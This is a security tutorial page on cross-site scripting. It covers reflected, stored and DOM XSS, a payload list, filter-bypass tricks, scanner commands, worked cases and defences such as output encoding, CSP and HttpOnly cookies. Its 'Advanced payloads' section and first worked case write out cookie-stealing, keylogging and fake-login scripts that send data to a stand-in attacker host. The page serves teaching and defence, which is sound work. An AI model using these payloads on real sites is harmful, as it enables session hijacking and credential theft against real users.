---
title: "XSS (Cross-Site Scripting)"
weight: 11
date: "2026-03-08T22:45:09+08:00"
lastmod: "2026-03-08T22:45:09+08:00"
---

## Overview

XSS (Cross-Site Scripting) is an injection attack in which the attacker gets script of their choosing into a web page so that it runs in other users' browsers, with that page's origin, cookies and DOM.

**OWASP Top 10**: A03:2021 (Injection)  
**Severity**: ⭐⭐⭐⭐

---

## XSS Types

### 1. Reflected XSS

The payload travels in the request (typically a URL parameter) and is echoed straight back into the response, where the browser renders it. The victim has to be made to open the crafted link.

```
# Example URL
http://target.com/search?q=<script>alert(1)</script>

# Back-end code (unsafe: the parameter is echoed without encoding)
echo "Search results: " . $_GET['q'];
```

### 2. Stored XSS

The payload is saved server-side (database, file, cache) and served to every user who views the affected page, so no crafted link is needed and the attacker can wait for a privileged viewer such as an administrator.

```
# Example: comment board
POST /comment
content=<script>alert(document.cookie)</script>

# Every user who views the comment list runs the script
```

### 3. DOM-based XSS

The payload never has to reach the server: client-side JavaScript reads it from a source such as `location.search` or `location.hash` and writes it into a dangerous sink (`document.write`, `innerHTML`, `eval`, ...).

```javascript
// Unsafe DOM operation: the whole query string is written into the page
var name = document.location.search.substring(1);
document.write("Hello " + name);
```

```
# Attacker URL
http://target.com/page.html?<script>alert(1)</script>
```

Caveat: browsers that follow the URL Standard percent-encode `<` and `>` in `location.search`, so this exact sink only fires if the page decodes the value first (for example with `decodeURIComponent()`); values read through `URLSearchParams.get()` (see case 3 below) are decoded automatically. Confirm the behaviour in the target browser before ruling a sink out.
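The source-to-sink path, as an added example that is not code from the original page: it runs under Node, whose global `URL` implements the same URL Standard parser that browsers use, so it shows why the raw `location.search` snippet above and the `URLSearchParams` snippet in case 3 behave differently. The two URLs are constructed sample input and `target.com` is a placeholder host.

```javascript
// Added example, not code from the original page: trace a DOM-XSS payload from
// its URL source to the sink, using the WHATWG URL parser (Node's global URL).
// The URLs below are constructed sample input; target.com is a placeholder.

// Source 1: location.search.substring(1), as in the snippet above.
// The URL parser percent-encodes '<' and '>' (and '"' and space) in the query,
// so the sink receives an encoded string and no element is created.
function rawSearchSource(urlString) {
  return new URL(urlString).search.substring(1);
}

// Source 2: URLSearchParams.get(), as in case 3. It percent-decodes the value,
// which is why an <img onerror> payload lands there intact.
function paramSource(urlString, param) {
  return new URLSearchParams(new URL(urlString).search).get(param);
}

// Source 3: a page that decodes the query by hand before using it. This is the
// common pattern that makes the document.write() snippet exploitable.
function decodedSearchSource(urlString) {
  return decodeURIComponent(rawSearchSource(urlString));
}

// Sink model: document.write / innerHTML simply concatenate. Return the markup
// the sink would receive and whether it now contains a start tag.
function sinkReceives(value) {
  const html = 'Hello ' + value;
  return { html, containsTag: /<[a-z]/i.test(html) };
}

// The two URLs used on this page (constructed sample input).
const SCRIPT_URL = 'http://target.com/page.html?<script>alert(1)</script>';
const PROFILE_URL = 'http://target.com/profile?name=<img src=x onerror=alert(1)>';

console.log('raw search      :', sinkReceives(rawSearchSource(SCRIPT_URL)));
console.log('decoded search  :', sinkReceives(decodedSearchSource(SCRIPT_URL)));
console.log('URLSearchParams :', sinkReceives(paramSource(PROFILE_URL, 'name')));
```

When auditing a DOM sink, look at both ends: the sink (`document.write`, `innerHTML`) and whether anything between the source and the sink decodes the value. A `decodeURIComponent()` or `URLSearchParams.get()` on the way is what turns the first snippet from "harmless" into exploitable.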

---

## Payload Collection

### Basic payloads

```html
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
```

### Breaking out of a quoted attribute

When the value is reflected inside `value="..."` or `value='...'`, close the quote first, then either close the tag or add an event handler that fires on its own (`autofocus` plus `onfocus`). The second pair needs no `<` or `>` at all, so a filter that strips angle brackets does not stop it.

```html
"><script>alert(1)</script>
'><script>alert(1)</script>
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='
```

### Bypassing a `<script>` tag filter

Any element with an event handler runs code without `<script>`; a `/` can replace the space before the attribute, which defeats filters that look for `<tag ` patterns.

```html
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<input onfocus=alert(1) autofocus>
```

### Bypassing keyword filters

```html
<!-- Mixed case: defeats case-sensitive matching -->
<ScRiPt>alert(1)</ScRiPt>

<!-- Double-write: a filter that deletes "<script>" in a single pass leaves the real tag behind -->
<scr<script>ipt>alert(1)</scr<script>ipt>

<!-- URL encoding: only useful when the filter runs before the server decodes the parameter -->
%3Cscript%3Ealert(1)%3C/script%3E

<!-- HTML entities: decoded by the browser only inside attribute values (e.g. href="javascript:...")
     or when the server decodes them before output; in text content they render literally -->
&#60;script&#62;alert(1)&#60;/script&#62;

<!-- JavaScript Unicode escapes: for values that land inside a JS string which is later
     written to the DOM or eval'd; inside plain HTML they stay literal text -->
\u003cscript\u003ealert(1)\u003c/script\u003e
```
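Why these bypasses keep working, as an added example that is not code from the original page: the tag and keyword payloads listed above are run through two blacklist filters of the kind they target, a naive single-pass strip and the "fixed" recursive, case-insensitive one, and a rough oracle reports which payloads would still execute. The filters, the oracle and the payload list are constructed for this illustration; the payloads themselves are the ones on this page.

```javascript
// Added example, not code from the original page: the bypass payloads above
// against two blacklist filters, to show that patching a blacklist does not
// converge. Payloads are the constructed samples listed on this page.

// Filter 1: delete "<script>" / "</script>" in a single, case-sensitive pass.
function stripScriptTag(input) {
  return input.replace(/<\/?script>/g, '');
}

// Filter 2: the "fixed" version: case-insensitive and repeated until the
// string stops changing, so a nested tag cannot reassemble itself.
function stripScriptUntilStable(input) {
  let out = input;
  let prev;
  do {
    prev = out;
    out = out.replace(/<\/?script>/gi, '');
  } while (out !== prev);
  return out;
}

// Rough oracle for "would the browser execute this": a <script> start tag, an
// inline event handler (preceded by whitespace or '/') or a javascript: URL.
function stillExecutes(html) {
  return /<script\b|[\s/]on\w+\s*=|javascript:/i.test(html);
}

// Constructed sample set: the payloads from the lists above.
const PAYLOADS = [
  '<script>alert(1)</script>',                  // baseline
  '<ScRiPt>alert(1)</ScRiPt>',                  // mixed case
  '<scr<script>ipt>alert(1)</scr<script>ipt>',  // double-write
  '<img src=x onerror=alert(1)>',               // other tag + handler
  '<svg/onload=alert(1)>',                      // '/' instead of space
  '<input onfocus=alert(1) autofocus>',         // handler that fires itself
];

// Payloads that still execute after the given filter has run over them.
function survivors(filter) {
  return PAYLOADS.filter((p) => stillExecutes(filter(p)));
}

console.log('survive single-pass filter:', survivors(stripScriptTag));
console.log('survive recursive filter  :', survivors(stripScriptUntilStable));
```

The recursive filter closes the mixed-case and double-write holes and changes nothing for the event-handler payloads, which is the general lesson: a blacklist can only ever remove the strings its author thought of. Encode output for its context instead (see the defences section).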

### Advanced payloads

```html
<!-- Cookie theft: sends the victim's cookies to the attacker. HttpOnly cookies are not readable,
     and navigating away is noisy; a new Image().src request is quieter -->
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- Keylogger: encodeURIComponent keeps keys such as & and # from breaking the request URL -->
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log?key=' + encodeURIComponent(e.key));
}
</script>

<!-- Phishing form: replaces the page body with a login form that submits to the attacker -->
<script>
document.body.innerHTML = '<form action="http://attacker.com/steal">' +
    '<input name="username"><input name="password" type="password">' +
    '<input type="submit" value="Login"></form>';
</script>

<!-- Defacement: document.write after load replaces the whole document -->
<script>document.write('<h1>Site under maintenance</h1>');</script>
```

---

## Tooling

### XSStrike

```bash
# Detect XSS in the given parameter
xsstrike -u "http://target.com/search?q=test"

# Fuzz the target's filters, 10 threads
xsstrike -u "http://target.com/search?q=test" --fuzzer --threads 10
```

### Dalfox

```bash
# Detect XSS in a single URL
dalfox url "http://target.com/search?q=test"

# Scan a list of URLs and write the results to a file
dalfox file urls.txt -o result.txt
```

### sqlmap (heuristic hint only)

sqlmap is not an XSS scanner, but during its heuristic phase it reflects a marker into each parameter and prints a line like `heuristic (XSS) test shows that GET parameter 'q' might be vulnerable to cross-site scripting (XSS) attacks` when it comes back unencoded. There is no `xss` tamper script; a plain run is enough to see the hint, which then has to be confirmed by hand or with one of the tools above.

```bash
sqlmap -u "http://target.com/search?q=test" --batch
```

---

## Worked Cases

### Case 1: Reflected XSS in a search box

```
# Detection
http://target.com/search?q=<script>alert(1)</script>

# Cookie theft
http://target.com/search?q=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
```

### Case 2: Stored XSS in a comment board

```
# Post a malicious comment
POST /comment
content=<img src=x onerror=alert(document.cookie)>

# Executes when an administrator views the comment
```

### Case 3: DOM XSS in a profile page

```javascript
// Front-end code: the parameter is decoded by URLSearchParams and written via innerHTML
var name = new URLSearchParams(window.location.search).get('name');
document.getElementById('greeting').innerHTML = 'Hello ' + name;
```

```
# Exploit. innerHTML does not execute <script> elements, so an event handler is used instead
http://target.com/profile?name=<img src=x onerror=alert(1)>
```

---

## Defences

1. **Output encoding** for the context the value lands in (HTML text, attribute, JavaScript string, URL). This is the primary fix; input sanitisation is a complement, not a replacement.
   ```php
   // PHP: HTML text and quoted-attribute context
   echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
   ```

2. **Input validation / sanitisation.** Where users may submit HTML, allowlist tags and attributes with a real HTML sanitiser that works on the parsed DOM; a regex over the raw string is the blacklist this page shows how to bypass.
   ```javascript
   // Allowlist applied by a sanitiser (DOMPurify shown as one example)
   const allowedTags = ['b', 'i', 'u'];
   const clean = DOMPurify.sanitize(userHtml, { ALLOWED_TAGS: allowedTags, ALLOWED_ATTR: [] });
   ```

3. **Content Security Policy (CSP).** Prefer the `Content-Security-Policy` response header; the `<meta>` form works but cannot carry `frame-ancestors` or `report-uri`. A policy without `'unsafe-inline'` blocks every inline `<script>` and `onerror=`-style handler in this page's payload list.
   ```html
   <meta http-equiv="Content-Security-Policy" 
         content="default-src 'self'; script-src 'self'">
   ```

4. **HttpOnly cookies.** `document.cookie` no longer returns the session cookie, so the cookie-theft payloads fail; injected script can still act as the user from inside the page. The array form of `setcookie()` needs PHP 7.3+.
   ```php
   setcookie('session', $value, [
       'httponly' => true,
       'secure' => true,
       'samesite' => 'Strict'
   ]);
   ```

5. **Use a front-end framework, and stay inside its defaults.** React, Vue and Angular escape interpolated text by default; the escape hatches (`dangerouslySetInnerHTML`, `v-html`, `bypassSecurityTrustHtml`) and `href`/`src` bindings that accept `javascript:` URLs reintroduce XSS.
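Context-aware output encoding in practice, as an added example that is not code from the original page: the reflected-XSS `echo` from the Types section is rebuilt as a Node template that puts the same value into three contexts (HTML text, a quoted attribute, a JavaScript string), once unsafely and once with the encoder that fits each context. The template, the payload and the helper names are constructed for this illustration.

```javascript
// Added example, not code from the original page: the search-results page from
// the reflected-XSS snippet, rendered unsafely and with context-aware encoding.
// Template and sample payload are constructed for this illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Text between tags and values inside quoted attributes: the JavaScript
// equivalent of htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// A value inside a quoted JavaScript string literal in a <script> block.
// HTML entities do not help there (the HTML parser never decodes inside
// <script>) and a literal "</script>" would close the block, so every
// character outside [A-Za-z0-9 ] becomes a \uXXXX escape; the JS engine turns
// the escapes back into the original characters at runtime.
function escapeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Unsafe: the same value concatenated raw into three contexts.
function renderUnsafe(q) {
  return [
    `<p>Search results: ${q}</p>`,
    `<input name="q" value="${q}">`,
    `<script>var lastQuery = "${q}";</script>`,
  ].join('\n');
}

// Hardened: each interpolation encoded for the context it lands in.
function renderSafe(q) {
  return [
    `<p>Search results: ${escapeHtml(q)}</p>`,
    `<input name="q" value="${escapeHtml(q)}">`,
    `<script>var lastQuery = "${escapeJsString(q)}";</script>`,
  ].join('\n');
}

// Count "</script>" closers: the hardened page must contain exactly one.
function countScriptClosers(html) {
  return html.split('</script>').length - 1;
}

// Constructed sample payload: breaks out of the attribute, closes the script
// block and injects an event handler in one string.
const PAYLOAD = '"></script><img src=x onerror=alert(1)>';

console.log(renderUnsafe(PAYLOAD));
console.log('---');
console.log(renderSafe(PAYLOAD));
```

The point of the third context is that `htmlspecialchars()` alone is not enough: a value inside `<script>` is parsed by the JavaScript engine, not the HTML parser, so it needs the `\uXXXX` treatment, and the safest design avoids putting user data inside script blocks at all (pass it through a `data-` attribute or a JSON `<script type="application/json">` block read with `textContent`).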

---

## References

- [XSS Payloads](https://github.com/pgaijin66/XSS-Payloads)
- [PayloadsAllTheThings - XSS](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
- [HackTricks - XSS](https://book.hacktricks.wiki/pentesting-web/xss-cross-site-scripting)
